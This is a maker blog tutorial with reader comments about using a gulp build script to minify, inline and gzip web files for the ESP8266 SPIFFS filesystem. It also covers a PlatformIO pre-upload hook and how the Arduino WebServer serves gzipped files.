"gulp-plumber": "^1.1.0", "gulp-uglify": "^1.5.3", "gulp-useref": "^3.1.2", "yargs": "^5.0.0" }, "dependencies": {} } As you can see it is a JSON document with some header fields and a list of dependencies. Save it in your code folder as “package.json” and run: npm install It will fetch and install all those modules in a node_modules subfolder (I suggest you to add this folder to your .gitignore file). Good, let’s move ahead. The builder script I am going to start by showing the script: /* ESP8266 file system builder with PlatformIO support Copyright (C) 2016 by Xose Pérez <xose dot perez system builder // ----------------------------------------------------------------------------- const gulp = require('gulp'); const plumber = require('gulp-plumber'); const htmlmin = require('gulp-htmlmin'); const cleancss = require('gulp-clean-css'); const uglify = require('gulp-uglify'); const gzip = require('gulp-gzip'); const del = require('del'); const useref = require('gulp-useref'); const gulpif = require('gulp-if'); const inline = require('gulp-inline'); /* Clean destination folder */ gulp.task('clean', function() { return del(['data/*']); }); /* Copy static files */ gulp.task('files', function() { return gulp.src([ 'html/**/*.{jpg,jpeg,png,ico,gif}', 'html/fsversion' ]) .pipe(gulp.dest('data/')); }); /* Process HTML, CSS, JS --- INLINE --- */ gulp.task('inline', function() { return gulp.src('html/*.html') .pipe(inline({ base: 'html/', js: uglify, css: cleancss, disabledTypes: ['svg', 'img'] })) .pipe(htmlmin({ collapseWhitespace: true, removeComments: true, minifyCSS: true, minifyJS: true })) .pipe(gzip()) .pipe(gulp.dest('data')); }) /* Process HTML, CSS, JS */ gulp.task('html', function() { return gulp.src('html/*.html') .pipe(useref()) .pipe(plumber()) .pipe(gulpif('*.css', cleancss())) .pipe(gulpif('*.js', uglify())) .pipe(gulpif('*.html', htmlmin({ collapseWhitespace: true, removeComments: true, minifyCSS: true, minifyJS: true }))) .pipe(gzip()) .pipe(gulp.dest('data')); }); /* Build file system */ gulp.task('buildfs', ['clean', 'files', 'html']); gulp.task('buildfs2', ['clean', 'files', 'inline']); gulp.task('default', ['buildfs']); // ----------------------------------------------------------------------------- // PlatformIO support // ----------------------------------------------------------------------------- const spawn = require('child_process').spawn; const argv = require('yargs').argv; var platformio = function(target) { var args = ['run']; if ("e" in argv) { args.push('-e'); args.push(argv.e); } if ("p" in argv) { args.push('--upload-port'); args.push(argv.p); } if (target) { args.push('-t'); args.push(target); } const cmd = spawn('platformio', args); cmd.stdout.on('data', function(data) { console.log(data.toString().trim()); }); cmd.stderr.on('data', function(data) { console.log(data.toString().trim()); }); } gulp.task('uploadfs', ['buildfs'], function() { platformio('uploadfs'); }); gulp.task('upload', function() { platformio('upload'); }); gulp.task('run', function() { platformio(false); }); Let’s focus on the “File system builder”. There are 5 tasks: - clean will delete all the contents of the data folder - files will copy all images to the data folder (right now we are not processing them) - html processes the HTML files (more on this later) - buildfs calls the prior 3 to build the project - default is just a convenient task to call buildfs if no task provided. The “html” task looks for all the *.html files in the development folder and reads them to extract references to *.js and *.css files (that’s what the “useref” plugin does). Then it generates 3 streams. The first one gets all the *.js files, merges them and minifies them (that’s what the “uglify” plugin does). Another one merges all the *.css files and minifies them (that’s what the “cleancss” plugin does). An the final one replaces all the references to the *.js and *.css files with the newly generated unified files in the HTML, and minifies it (that’s what the “htmlmin” plugin does). Finally all the resulting files get gzipped and stored in the data folder, along with all the images. The good thing about this builder script is that you don’t have to worry about the files you add or delete from your HTML file. It will just read them and merge them in the same order they are in your code. That’s very important since often there are dependencies between files (css precedence, scripts that require jQuery to be defined,…). Injecting code The “useref” plugin requires some metadata in the HTML file to know where it should read the files from and inject the new code. A typical file would look like this: <!DOCTYPE html> <html> <head> <title>WEB CONFIG</title> <meta charset="utf-8" /> <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- build:css style.css --> <link rel="stylesheet" href="pure-min.css" /> <link rel="stylesheet" href="side-menu.css" /> <link rel="stylesheet" href="grids-responsive-min.css" /> <link rel="stylesheet" href="custom.css" /> <!-- endbuild --> </head> <body> ... </body> <!-- build:js script.js --> <script src="jquery-1.12.3.min.js"></script> <script src="custom.js"></script> <!-- endbuild --> </html> As you can see the places where the plugin should read and inject new code are defined by “build” comments like this one: “ “. You have to define the type of files it contains (css) and the name of the output merged file (style.css). All the code from this opening comment to the “ ” closing comment will be replaced by: Same for the javascript block. Now, instead of naming your file system folder “data” like the ESP8266FS documentation suggests, name it “html” (or whatever other name, but the code above requires it to be “html”). To run the builder just type from the command line in your code folder: gulp If everything goes OK your data folder will have 3 files at least (not counting images): index.html.gz, style.css.gz and script.js.gz. Inline JS and CSS? [UPDATE 2016-09-05] I’ve added the option to get the CSS and JS files and inject them inline in the HTML. This way you end up having just one HTML file, albeit a big one. My tests show that the overall performance is around a 15% faster, both downloading the code (the compressed index.html.gz file is 50 bytes lighter in my test project and the browser only downloads one file instead of 3) and rendering it. If you had already copied the previous code chunks you will have to update them, both the package.json and the gulpfile.js have modifications, then remember to “npm install” to add new dependencies. Then you can use this “inline” option by calling: gulp buildfs2 Anyway I still don’t know which is better, since I think the split version can benefit from caching, which is the next step in the investigation… GZIPping? Compressing the files makes them lighter and that means you can fit more code in the same room and it will download faster too. But how does the ESP8266 handle it? Well, this code is not mine and it’s pretty standard when using the WebServer library from the Arduino Core for ESP8266, let’s see what it does: bool handleFileRead(String path) { if (path.endsWith("/")) path += "index.html"; String contentType = getContentType(path); String pathWithGz = path + ".gz"; if (SPIFFS.exists(pathWithGz)) path = pathWithGz; if (SPIFFS.exists(path)) { File file = SPIFFS.open(path, "r"); size_t sent = server.streamFile(file, contentType); size_t contentLength = file.size(); file.close(); return true; } return false; } As you can see the code gets the requested path, translates “/” to “index.html” for the home and grabs the content type from the file extension (not in the code, somewhere else, but that’s what it does). Then it checks if there is a file with the same name plus “.gz”, and if it exists that’s the file it will read. The code is completely agnostic to the contents of the file, it just streams it. But then, deep in the guts of the WebServer library we find this: template<typename T> size_t streamFile(T &file, const String& contentType){ setContentLength(file.size()); if (String(file.name()).endsWith(".gz") && contentType != "application/x-gzip" && contentType != "application/octet-stream"){ sendHeader("Content-Encoding", "gzip"); } send(200, contentType, ""); return _currentClient.write(file); } So, if the file we are reading ends with “.gz” and we are not serving a gzip file or a binary file, then we are sending something else compressed and hence we should set the Content-Encoding header to “gzip”. Voilà. Our browser will receive the file and it will know it has to decompress it prior to render it. See the difference? What about the images? The builder script just copies the images at the moment. There is room for improvement here: compressing them, creating sprites,… PlatformIO The builder script above has 3 more tasks to use them with PlatformIO. The main reason for this is that it’s convenient to run “gulp buildfs” (or “gulp” since the default tasks is “buildfs”) before uploading the file system. I’m not good at remembering such things and end up wasting time wondering why I can’t see my changes. So instead of running “gulp” and then do and “uploadfs” from platformio I just do: gulp uploadfs -e ota -p 192.168.1.113 And my changes are built and flashed via OTA to the device at 192.168.1.113. Neat! [UPDATE 2016-09-05] As Ivan Kravets, CTO at PlatformIO, commented below, I could use the “extra_script” feature to call a python script where I can define callbacks or hooks for certain actions, for instance to call my “gulp buildfs” before uploading the file system to the board. The code he added in his comment is a good example of the feature, but I didn’t work for me. Apparently the pre-hook for “uploadfs” is actually called after calling “mkspiffs”. A simple test with a unexistant “data” folder throws an error, but if it had called the gulp task there would be a data folder. Nevertheless I found a way around the problem when I read in the documentation that they are using filenames as targets for the AddPreAction method. I tested with the spiffs.bin file and it worked! Here’s the python script: #!/bin/python from SCons.Script import DefaultEnvironment env = DefaultEnvironment() def before_build_spiffs(source, target, env): env.Execute("gulp buildfs") env.AddPreAction(".pioenvs/%s/spiffs.bin" % env['PIOENV'], before_build_spiffs) Now you just have to add “extra_script = pio_hooks.py” (or the name of your script) to all the environments you want in your platformio.ini file and you are good to go, no need to call gulp, just do as usual: pio run -e node -t uploadfs Even neater! Optimizing files for SPIFFS with Gulp by Tinkerman is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. Hi, Thanks a lot for great article and hint with optimization. I added it to our list I would like to share a hint how to keep PlatformIO workflow without changes and re-use your `gulp` idea. PlatformIO allows to define custom `extra_script` ( ) where you will be able to control current build targets or add new. For example, in your case we need to execute specific command before `uploadfs` target. Let’s do it: “`python Import(“env”) def before_uploadfs(source, target, env): env.Execute(“gulp buildfs”) env.AddPreAction(“uploadfs”, before_uploadfs) “` This approach allows to use PlatformIO IDE for SPIFFS uploading without modifications and Terminal. Regards, Ivan The PlatformIO Team Thanks a lot for your comment, Ivan. I also want to thank you guys for that awesome tool, “platformio init” is my first step in every project I work. But it looks like I have not dived deep enough in it. The custom script feature is indeed a much better solution and will give it a try soon. Thanks again! I updated the post with info about using the extra_script feature to process the files before uploading them. Had some issues on the road but I made it! Thanks so much. > “platformio init” is my first step in every project I work. Do you do it with new project or existing? Both. In the past I’ve used makefiles and ino (inotool.org). Whenever I have to update any of those projects I first migrate them to use platformio. Are these new boards useful for static HTML files with their additional memory usable for static HTML files? In theory yes, but I guess they will require some changes in the flash layout to use those 16Mbytes memories. I will know soon, I have ordered a pair. Looks fabulous thanks! Do you know of any way to get gulp to include the actual JS and CSS source inline within the html document? Actually yes. gulp-inline and gulp-inline-css claim to do just that. Haven’t test them thou. Thanks, the ‘gulp-inline’ package seems to be working well here for inlining both css and js resources: 1) I npm installed the package 2) I included the new ‘require’ in gulpfile.js: const inline = require(‘gulp-inline’); 3) I injected the new task into your existing html pipeline e.g.: .pipe(inline({ base: ‘data.unminified/’, js: uglify, css: cleancss })) The end result is and tags are replaced with inlined minified css and js source within the minified gzipped html files. This is actually quite marvelous for me because this is a process I was hand cranking until you showed me the light 🙂 Thanks again Joe Great, just updated the post with my own findings on the subject. It’s actually faster than having 3 files (html, js and css) but I think that the 3 files pattern could benefit from caching files… more on that in the future. Thank you very much for your idea! Cool good job. I agree that reducing the number of requests / responses by inlining all resources is good a thing from an ESP8266 performance perspective. That said, the reason I started down this path a few months ago was for stability reasons rather than performance reasons as I found the device to be more stable under load with a single html document request pattern as opposed to multiple requests for html, css, js. I’ve implemented 304 ‘not modified’ server/client response caching in my own firmware and that can help hugely too and I’d say it’s definitely something worth doing. But most recently I’ve been serving device content through an nginx reverse proxy caching server for TLS/SSL purposes which in a way mostly makes the implementation of onboard device caching redundant () Absolutely must read article, thank you! I’ve worked with nginx for years and it’s a great choice, but it ass a level of complexity to the overall solution, only for the tech guy out there. Most people with that requirement (accessing their ESP8266 devices from the internet) will just forward a port in their router, that if they know how to, so basically non-tech people out there will not have this requirement in the first place. About the caching, I was thinking on migrating to ESPAsyncWebServer by no-me-dev. It has a bunch of goodies, including caching, authentification and filtering requests. I’m glad you found that useful, share and share alike and all that 🙂 As I mentioned in that article, my primary goal there was to implement TLS/SSL protection for my ESP devices and as I ended up with an nginx reverse proxy solution, it came with nice caching benefits too. I agree not a solution for non-techie types although I expect most guys playing with ESP8266 / networked mcu devices are going to be a bit nerdy anyway. I expect I’m out of touch with routers and what’s possible with a semi decent one nowadays. My own router is a bit rubbish and port forwarding just forwards unprotected traffic onto some other host. So I ended up port forwarding traffic through my router to my nginx proxy which handles the job of TLS/SSL offload and proxying traffic onto my backend ESPs. My firmware stuff is based on the fabulous ESP8266 Arduino Core too and I’m in two minds whether to implement an ESPAsyncWebServer version of my web server class. I’m undecided because the ESP8266WebServer implementation I’m using right now is working well enough and if I had to make the switch to an async server implementation, I guess it would have to be for performance reasons. Anyway sorry to drift off topic from your article, I know this isn’t the place for general discussion. Feel free to delete this post if you don’t want to publish it no worries. This conversation is very interesting. I’m glad you found my post and decided to write a comment on it. I’ll take a close look at your work in the future. I’m not very familiar with gulp… I can get the default to work and produce 3 files.. but what i’m really interested in is the single file with everything inlined… I get this error any ideas why this fails? Cheers for whatever reason it is the inclusion of that is causing it to bork! this is the js file for jQuery mobile… any clues? Hi Don’t know why it fails, apparently it’s malformed but I guess it works when not inline, right? I will try it myself today to see if I can reproduce the error.
http://tinkerman.cat/optimizing-files-for-spiffs-with-gulp/
CC-MAIN-2017-04
refinedweb
3,386
73.78
There with C# source code are available to accompany this topic: What You'll Build For this tutorial, you'll add mobile features to the simple conference-listing application that's provided in the starter project. The following screenshot shows the tags page of the completed application as seen in the Windows 7 Phone Emulator.. Skills You'll Learn Here's what you'll learn: - How the ASP.NET MVC 4 templates use the HTML5 viewportattribute and adaptive rendering to improve display on mobile devices. - How to create mobile-specific views. - How to create a view switcher that lets users toggle between a mobile view and a desktop view of the application. Getting Started Download the conference-listing application for the starter project using the following link: Download. Then in Windows Explorer, right-click the MvcMobile.zip file and choose Properties. In the MvcMobile.zip Properties dialog box, choose the Unblock button. (Unblocking prevents a security warning that occurs when you try to use a .zip file that you've downloaded from the web.) Right-click the MvcMobile.zip file and select Extract All to unzip the file. In Visual Studio, open the MvcMobile.sln file. Press CTRL+F5 to run the application, which will display it in your desktop browser. Start your mobile browser emulator, copy the URL for the conference application into the emulator, and then click the Browse by tag link. If you are using the Windows Phone Emulator, click in the URL bar and press the Pause key to get keyboard access. The image below shows the AllTags view (from choosing Browse by tag). The display is very readable on a mobile device. Choose the ASP.NET link. The ASP.NET tag view is very cluttered. For example, the Date column is very difficult to read. Later in the tutorial you'll create a version of the AllTags view that's specifically for mobile browsers and that will make the display readable. Note: Currently a bug exists in the mobile caching engine. For production applications, you must install the Fixed DisplayModes nugget package. See ASP.NET MVC 4 Mobile Caching Bug Fixed for details on the fix. CSS Media Queries CSS media queries are an extension to CSS for media types. They allow you to create rules that override the default CSS rules for specific browsers (user agents)., it will use the CSS rules inside this media block. You can use CSS media queries like this to provide a better display of HTML content on small browsers (like mobile browsers) than the default CSS rules that are designed for the wider displays of desktop browsers.. The following line shows the viewport <meta> tag in the ASP.NET MVC 4 layout file. <meta name="viewport" content="width=device-width"> Examining the Effect of CSS Media Queries and the Viewport Meta Tag Open the Views\Shared\_Layout.cshtml file in the editor and comment out the viewport <meta> tag. The following markup shows the commented-out line. @*<meta name="viewport" content="width=device-width">*@ Open the MvcMobile\Content\Site.css file in the editor and change the maximum width in the media query to zero pixels. This will prevent the CSS rules from being used in mobile browsers. The following line shows the modified media query: @media only screen and (max-width: 0px) { ... Save your changes and browse to the Conference application in a mobile browser emulator. The tiny text in the following image is the result of removing the viewport <meta> tag. With no viewport <meta> tag, the browser is zooming out to the default viewport width (850 pixels or wider for most mobile browsers.) Undo your changes — uncomment the viewport <meta> tag in the layout file and restore the media query to 850 pixels in the Site.css file. Save your changes and refresh the mobile browser to verify that the mobile-friendly display has been restored.4 Conference to Conference (Mobile). In each Html.ActionLink call, remove "Browse by" in each link ActionLink. The following code shows the completed body section of the mobile layout file. <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>@ViewBag.Title</title> @Styles.Render("~/Content/css") @Scripts.Render("~/bundles/modernizr") </head> <body> <div id="title"> <h1> Conference (Mobile)</h1> </div> <div id="menucontainer"> <ul id="menu"> <li>@Html.ActionLink("Home", "Index", "Home")</li> <li>@Html.ActionLink("Date", "AllDates", "Home")</li> <li>@Html.ActionLink("Speaker", "AllSpeakers", "Home")</li> <li>@Html.ActionLink("Tag", "AllTags", "Home")</li> </ul> </div> @RenderBody() @Scripts.Render("~/bundles/jquery") @RenderSection("scripts", required: false) </body> </html>. In contrast, the desktop display has not changed.. Open the Global.asax file and add the following code. In the code, right-click DefaultDisplayMode, choose Resolve, and then choose using System.Web.WebPages;. This adds a reference to the System.Web.WebPages namespace, which is where the DisplayModes and DefaultDisplayMode types are defined. Alternatively, you can just manually add the following line to the using section of the file. using System.Web.WebPages; The complete contents of the Global.asax file is shown below.); } } } Save the changes. Copy the MvcMobile\Views\Shared\_Layout.Mobile.cshtml file to MvcMobile\Views\Shared\_Layout.iPhone.cshtml. Open the new file and then change the h1 heading from Conference (Mobile) to Conference (iPhone). Copy the MvcMobile\Views\Home\AllTags.Mobile.cshtml file to MvcMobile. The following screenshot shows the AllTags view rendered in the Safari browser. You can download Safari for Windows here.. To start, delete the Shared\_Layout.Mobile.cshtml and Shared\_Layout.iPhone.cshtml files that you created earlier. Rename Views\Home\AllTags.Mobile.cshtml and Views\Home\AllTags.iPhone.cshtml files to Views\Home\AllTags.iPhone.cshtml.hide and Views\Home\AllTags.Mobile.cshtml.hide. Because the files no longer have a .cshtml extension, they won't be used by the ASP.NET MVC runtime to render the AllTags view. Install the jQuery.Mobile.MVC NuGet package by doing this: From the Tools menu, select Package Manager Console, and then select Library Package Manager.); } } } BundleMobileConfigline above in yellow highlight, click the Compatibility View button" /> in IE to make the icon change from an outline" /> to a solid color. Alternatively you can view this tutorial in FireFox or Chrome. Open the MvcMobile\Views\Shared\_Layout.Mobile.cshtml file and add the following markup directly after the Html.Partial call: <div data- @Html.ActionLink("Home", "Index", "Home") @Html.ActionLink("Date", "AllDates") @Html.ActionLink("Speaker", "AllSpeakers") @Html.ActionLink("Tag", "AllTags") </div> The complete> <body> <div data- @Html.Partial("_ViewSwitcher") <div data- @Html.ActionLink("Home", "Index", "Home") @Html.ActionLink("Date", "AllDates") @Html.ActionLink("Speaker", "AllSpeakers") @Html.ActionLink("Tag", "AllTags") </div> <div data- <h1>@ViewBag.Title</h1> </div> <div data- @RenderSection("featured", false) @RenderBody() </div> </div> </body> <. In addition to the style changes, you see Displaying mobile view and a link that lets you switch from mobile view to desktop view. Choose the Desktop view link, and the desktop view is displayed. The desktop view doesn't provide a way to directly navigate back to the mobile view. You'll fix that now. Open the Views\Shared\_Layout.cshtml file. Just under the page body element, add the following code, which renders the view-switcher widget: @Html.Partial("_ViewSwitcher") Refresh the AllTags view in the mobile browser. You can now navigate between desktop and mobile views. else { @:Not Mobile/Get }and adding the following heading to the Views\Shared\_Layout.cshtml file. <h1> Non Mobile Layout MVC4 Conference </h1> Browse to the AllTags page in a desktop browser. The view-switcher widget is not displayed in a desktop browser because it's added only to the mobile layout page. Later in the tutorial you'll see how you can add the view-switcher widget to the desktop view. Improving the Speakers List In the mobile browser, select the Speakers link. Because there's no mobile view(AllSpeakers.Mobile.cshtml), the default speakers display (AllSpeakers.cshtml) is rendered using the mobile layout view (_Layout.Mobile.cshtml).. (That is,. You can disable consistent display mode in a; } Creating a Mobile Speakers View As you just saw, the Speakers view is readable, but the links are small and are difficult to tap on a mobile device. In this section, you'll create a mobile-specific Speakers view that looks like a modern mobile application — it displays large, easy-to-tap links and contains a search box to quickly find speakers. Copy AllSpeakers.cshtml to AllSpeakers.Mobile.cshtml. Open the AllSpeakers.Mobile.cshtml file and remove the <h2> heading element. In the <ul> tag, add the data-role attribute and set its value to listview. Like other data-* attributes, data-role="listview" makes the large list items easier to tap. This is what the completed markup looks like: @model IEnumerable<string> @{ ViewBag. @foreach(var speaker in Model) { <li>@Html.ActionLink(speaker, "SessionsBySpeaker", new { speaker })</li> } </ul> Refresh the mobile browser. The updated view looks like this: Although the mobile view has improved, it's difficult to navigate the long list of speakers. To fix this, in the <ul> tag, add the data-filter attribute and set it to true. The code below shows the ul markup. <ul data- The following image shows the search filter box at the top of the page that results from the data-filter attribute. As you type each letter in the search box, jQuery Mobile filters the displayed list as shown in the image below. Improving the Tags List Like the default Speakers view, the Tags view is readable, but the links are small and difficult to tap on a mobile device. In this section, you'll fix the Tags view the same way you fixed the Speakers view. Remove the "hide" suffix to the the Views\Home\AllTags.Mobile.cshtml.hide file so the name is Views\Home\AllTags.Mobile.cshtml. Open the renamed file and remove the <h2> element. Add the data-role and data-filter attributes to the <ul> tag, as shown here: <ul data- The image below shows the tags page filtering on the letter J. Improving the Dates List You can improve the Dates view like you improved the Speakers and Tags views, so that it's easier to use on a mobile device. Copy the Views\Home\AllDates.cshtml file to Views\Home\AllDates.Mobile.cshtml. Open the new file and remove the <h2> element. Add data-role="listview" to the <ul> tag, like this: <ul data- The image below shows what the Date page looks like with the data-role attribute in place.Replace the contents of the Views\Home\AllDates.Mobile.cshtml file with the following code: > This code groups all sessions by days. It creates a list divider for each new day, and it lists all the sessions for each day under a divider. Here's what it looks like when this code runs: Improving the SessionsTable View In this section, you'll create a mobile-specific view of sessions. The changes we make will be more extensive than in other views we have created. In the mobile browser, tap the Speaker button, then enter Sc in the search box. Tap the Scott Hanselman link. As you can see, the display is difficult to read on a mobile browser. The date column is hard to read and the tags column is out of the view. To fix this, copy Views\Home\SessionsTable.cshtml to Views\Home\SessionsTable.Mobile.cshtml, and then replace the contents of the file with the following code: @using MvcMobile.Models @model IEnumerable<Session> <ul data- @foreach(var session in Model) { <li> <a href="@Url.Action("SessionByCode", new { session.Code })"> <h3>@session.Title</h3> <p><strong>@string.Join(", ", session.Speakers)</strong></p> <p>@session.DateText</p> </a> </li> } </ul> The code removes the room and tags columns, and formats the title, speaker, and date vertically, so that all this information is readable on a mobile browser. The image below reflects the code changes. Improving the SessionByCode View Finally, you'll create a mobile-specific view of the SessionByCode view. In the mobile browser, tap the Speaker button, then enter Sc in the search box. Tap the Scott Hanselman link. Scott Hanselman's sessions are displayed. Choose the An Overview of the MS Web Stack of Love link. The default desktop view is fine, but you can improve it. Copy the Views\Home\SessionByCode.cshtml to Views\Home\SessionByCode.cshtml and replace the contents of the Views\Home\SessionByCode.Mobile.cshtml file with the following markup: @model MvcMobile.Models.Session @{ ViewBag. <li data-Speakers</li> @foreach (var speaker in Model.Speakers) { <li>@Html.ActionLink(speaker, "SessionsBySpeaker", new { speaker })</li> } </ul> <p>@Model.Description</p> <h4>Code: @Model.Code</h4> <ul data- <li data-Tags</li> @foreach (var tag in Model.Tags) { <li>@Html.ActionLink(tag, "SessionsByTag", new { tag })</li> } </ul> The new markup uses the data-role attribute to improve the layout of the view. Refresh the mobile browser. The following image reflects the code changes that you just made: Mobile site. - jQuery Mobile Overview - W3C Recommendation Mobile Web Application Best Practices - W3C Candidate Recommendation for media queries This article was originally created on August 15, 2012
http://www.asp.net/mvc/overview/older-versions/aspnet-mvc-4-mobile-features
CC-MAIN-2015-06
refinedweb
2,198
60.51
The annual NYU Polytechnic School of Engineering Cyber Security Awareness Week (CSAW) Capture The Flag (CTF) competition online qualifiers were held September 19-21, 2014. This is a writeup of one of the Exploitation challenges we solved: "saturn". The problem has this hint with an attached file. You have stolen the checking program for the CSAW Challenge-Response-Authentication-Protocol system. Unfortunately you forgot to grab the challenge-response keygen algorithm (libchallengeresponse.so). Can you still manage to bypass the secure system and read the flag? nc 54.85.89.65 8888 We start off with a typical examination of the file: [root@localhost saturn]# file saturn saturn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xa55828fef5637b04d127681ada4a06b332d54a9c, stripped The CTF hint gave us the tip to look for which shared objects the binary is linked with. [root@localhost saturn]# ldd saturn linux-gate.so.1 => (0xb77f8000) libchallengeresponse.so => not found libc.so.6 => /lib/libc.so.6 (0x48ad5000) /lib/ld-linux.so.2 (0x48ab2000) So we can’t even run saturn yet because we didn’t steal the “challenge-response keygen algorithm.” We look at the imports of saturn and notice that fillChallengeResponse is among them. So we create a .c file containing a prototype for that function that will be exported. For now, ignore the contents of the function… that comes later. #include <stdio.h> #include <stdlib.h> #include <string.h> void hexdump(unsigned char * arr){ int i; for(i=0;i<16;i++){ printf("%x ", arr[i]); } } unsigned char * challenge = "0123456789abcdef0123456789ABCDEF"; unsigned char * response = "ZXCVBNMKJHGFDSAPzxcvbnmkjhgfdsap"; void fillChallengeResponse(int a, int b, int c, int d, int e, int f){ printf("Inside fillChallengeResponse\n"); printf("Got 0x%x, 0x%x, 0x%x, 0x%x, 0x%x, 0x%x\n", a, b, c, d, e, f); memcpy((void *)a, (void*)challenge, 32); memcpy((void *)b, (void*)response, 32); } libchallengeresponse.c Compile it into a .so. [root@localhost saturn]# gcc -shared libchallengeresponse.c -o libchallengeresponse.so Assuming that both saturn and your new .so are in the same directory, you can simply add the current directory to your library path. [root@localhost saturn]# export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:. Now you can run saturn, and since we have exported the environment variable, you can run it inside gdb and it will pick up your .so. At this point you can combine dynamic and static analysis as well as some guess work. I arrived at the answer mostly through static analysis, although ddd contributed as well. You can run the program listening on the network with a command like [root@localhost saturn]# nc -l 8888 -e saturn -x ncout.txt Opening saturn in your favorite disassembler (say, IDA Pro), we look for the use of the fillChallengeResponse function we created earlier. In that area of the program, we find this main code loop: I labeled some of the functions in blue based on analyzing the disassembly. The key is to look for known imports ( fread, read, write, etc.) of library functions and examine their arguments. We see here by following the logic from top to bottom that if the first four bits of the byte the program reads from stdin is 0xA, it goes to “ print_4_bytes_of_buf“; if it’s 0xE, it goes to “ save_response“; and if it’s 0x8, it goes to “ check_resp_and_print_flag.” You know it’s the flag function because of the obvious fread of “ flag.txt” in that function’s machine code. At this point, we have uncovered most of the algorithm the server uses. The last piece of the puzzle is to recognize that the two arguments to the fillChallengeResponse function in libchallengeresponse.so are next to each other in the binary’s .data section ( 0x804A0C0 and 0x804A0E0). They are both 32 bytes. The key is that the four least significant bits of the 0xA0 code is used to index into that memory. Since it reads four bytes at a time, we can actually read 64 bytes of memory using the range 0xA0-0xAF, not just 32 bytes! So we write a quick and dirty Python script to send the bytes to the server, read past the challenge into the response, send the response back, and then ask for the contents of flag.txt. #!/usr/bin/env python import sys, socket, struct def get_response(s): """Get a response from the socket.""" response = s.recv(1024) print "The challenge server says: ", response print "\tBytes: %s" % hex_dump(response) return response def hex_dump(arr): """Pretty print""" return ":".join("{:02x}".format(ord(c)) for c in arr) #Arguments: <IP of challenge server> <port> if __name__ == "__main__": s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], int(sys.argv[2]))) #Get the banner message get_response(s) print "Sending bytes" challenge = "" #Send increasing values from 0xa0. The 4 LSBits of this code # are used as an index into the array. Each aX value sent # to the challenge server retrieves 4 bytes #Note that 0x10*4 > 0x20, so we're going to retrieve bytes # from outside the challenge buffer in memory. for i in range(0x10): val = 0xa0 + i s.send(struct.pack("<B", val)) #Get 4 bytes of memory from the server response = get_response(s) for c in response: challenge += c print "Complete response: ", hex_dump(challenge) #We overran the buffer so the last half of the array is # the expected response myresponse = challenge[32:] print "Sending back challenge: ", hex_dump(myresponse) #Send a series of values increasing from 0xe0 followed by # 4 bytes of the expected response. The server doesn't # respond in between our sends. #8*4 = 32 bit response for i in range(8): val = 0xe0 + i s.send(struct.pack("<B", val)) ri = i*4 s.send(struct.pack("<BBBB", ord(myresponse[ri]), ord(myresponse[ri+1]), ord(myresponse[ri+2]), ord(myresponse[ri+3]))) print "Sent challenge" #Now that we've sent the correct response back to the server, we # send the final magic code to trigger the check and cause the server # to print the contents of flag.txt print "Sending final code..." s.send(struct.pack("<B", 0x80)) get_response(s) print "Exiting..." saturn.py And here is the output from the CSAW server: [root@localhost saturn]# python saturn.py 54.85.89.65 8888 The challenge server says: CSAW ChallengeResponseAuthenticationProtocol Flag Storage Bytes: 43:53:41:57:20:43:68:61:6c:6c:65:6e:67:65:52:65:73:70:6f:6e:73:65:41:75:74:68:65:6e:74:69:63:61:74:69:6f:6e:50:72:6f:74:6f:63:6f:6c:20:46:6c:61:67:20:53:74:6f:72:61:67:65:0a Sending bytes The challenge server says: x��@ Bytes: 78:ea:cd:40 The challenge server says: �<\ Bytes: dd:3c:01:5c The challenge server says: Eȣ( Bytes: 45:c8:a3:28 The challenge server says: ���H Bytes: a1:eb:d9:48 The challenge server says: �I�P Bytes: e3:49:d8:50 The challenge server says: J�Xv Bytes: 4a:82:58:76 The challenge server says: '��1 Bytes: 27:c0:fd:31 The challenge server says: ���( Bytes: de:f8:f0:28 The challenge server says: �h1 Bytes: f9:68:10:31 The challenge server says: ��y% Bytes: 81:9f:79:25 The challenge server says: ٧|# Bytes: d9:a7:7c:23 The challenge server says: jl~ Bytes: 03:6a:6c:7e The challenge server says: ���S Bytes: 9e:b8:e7:53 The challenge server says: ��S Bytes: a4:c3:53:20 The challenge server says: o=+ Bytes: 00:6f:3d:2b The challenge server says: `�� Bytes: 60:9f:bb:00 Complete response: 78:ea:cd:40:dd:3c:01:5c:45:c8:a3:28:a1:eb:d9:48:e3:49:d8:50:4a:82:58:76:27:c0:fd:31:de:f8:f0:28 Sending back challenge: Sent challenge Sending final code... The challenge server says: flag{greetings_to_pure_digital} Bytes: 66:6c:61:67:7b:67:72:65:65:74:69:6e:67:73:5f:74:6f:5f:70:75:72:65:5f:64:69:67:69:74:61:6c:7d:0a Exiting... Flag: greetings_to_pure_digital
https://www.digitaloperatives.com/2014/09/22/csaw-ctf-2014-qualification-round-write-up-exploitation-400-saturn/
CC-MAIN-2021-43
refinedweb
1,361
62.78
hello, i am working on a tempconverter program, i have tried a number of things to get this program to work and everytime i try something it seems to either mess something else up, or only do half of what i need it to do. could anyone give me some hints or insight as to what i am doing wrong? thanks Code: double fTOc(double); //Fahrenheit to Celsius double cTOf(double); //Celsius to Fahrenheit int main() { double temp;//temperature entered char scale[1];//identify scale used (C or F) double absZeroC = -273.15;//variable to easier identify absolute zero in Celsius double absZeroF = -459.67;//variable to easier identify absolute zero in Fahrenheit printf("Enter the temperature followed by F or C( Ex: \"75 F\"):"); scanf("%lf%s", &temp, scale); if (scale == "C") if (temp > absZeroC) printf("\nTemperature in Fahrenheit is %f.\n", cTOf(temp)); else if ( temp < absZeroC) printf("\nTemperature %f is less than absolute zero %f", temp, absZeroC); if (scale == "F") if (temp > absZeroF) printf("\nTemperature in Celsius is %f.\n", fTOc(temp)); else if (temp < absZeroF) printf("\nTemperature %f is less than absolute zero %f", temp, absZeroF); else printf("\nInvalid scale entry! Use C for Celsius or F for Fahrenheit!\n\n"); system("pause"); return 0; } double fTOc(double f)//fah to celsius { return (5.0 / 9.0) * (f - 32); } double cTOf(double c)//celsius to fah { return ((9.0 / 5.0) * c) + 32; }
http://cboard.cprogramming.com/c-programming/112968-help-temp-converter-printable-thread.html
CC-MAIN-2014-49
refinedweb
237
52.6
